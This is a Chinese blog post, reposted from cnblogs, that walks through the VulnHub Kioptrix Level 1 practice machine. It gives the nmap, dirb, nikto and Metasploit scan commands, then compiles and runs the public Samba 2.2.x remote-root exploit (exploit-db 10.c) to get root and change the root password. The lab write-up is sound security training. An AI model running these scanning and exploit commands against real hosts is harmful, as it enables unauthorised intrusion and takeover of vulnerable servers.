码迷,mamicode.com
首页 > 其他好文 > 详细

PJzhang:vulnhub靶机Kioptrix系列KIOPTRIX:LEVEL 1

时间:2020-09-17 17:58:24      阅读:21      评论:0      收藏:0      [点我收藏+]

标签:uid   bin   扫描   地址   open   改密码   服务   lin   bash   

猫宁~~~

 

地址:https://www.vulnhub.com/entry/kioptrix-level-1-1,22/

重点关注工具使用和测试思路。

kali linux攻击机   192.168.100.4

nmap 192.168.100.0/24

确认靶机的IP

Kioptrix-1.0靶机   192.168.100.5

nmap -sV -p1-65535 192.168.100.5

全端口扫描

结果如下,开放22,80,139,443,系统是centos

22   ssh   

OpenSSH 2.9p2 (protocol 1.99)

80   http   

Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)

111/tcp  open  rpcbind     

2 (RPC #100000)

139/tcp  open  netbios-ssn 

Samba smbd (workgroup: MYGROUP)

443/tcp  open  ssl/https   

Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b

1024/tcp open  status      

1 (RPC #100024)

dirb 192.168.100.5

扫描目录

nikto -h 192.168.100.5

扫描linux相关指纹与漏洞

重点关注一下开放139端口的Samba smbd服务。

msfconsole

search smb

use auxiliary/scanner/smb/smb_version

show options

set rhost 192.168.100.5

run

Host could not be identified: Unix (Samba 2.2.1a)

searchsploit samba

Samba < 2.2.8 (Linux/BSD) - Remote Code Execution

/usr/share/exploitdb/exploits/multiple/remote/10.c

cp /usr/share/exploitdb/exploits/multiple/remote/10.c /root/10.c 

尝试一下。

payload地址:https://www.exploit-db.com/exploits/10

gcc 10.c -o muma

./muma -d 0 -C 60 -S 192.168.100

扫描1个C段。

./muma -b 0 -v 192.168.100.5

直接获取root权限。

uid=0(root) gid=0(root) groups=99(nobody)

python -v

显示python版本是1.5的

python -c ‘import pty; pty.spawn("/bin/bash")‘

无法运行

passwd命令修改密码为123456

经虚拟机登录上去。

 

PJzhang:vulnhub靶机Kioptrix系列KIOPTRIX:LEVEL 1

标签:uid   bin   扫描   地址   open   改密码   服务   lin   bash   

原文地址:https://www.cnblogs.com/landesk/p/13630046.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!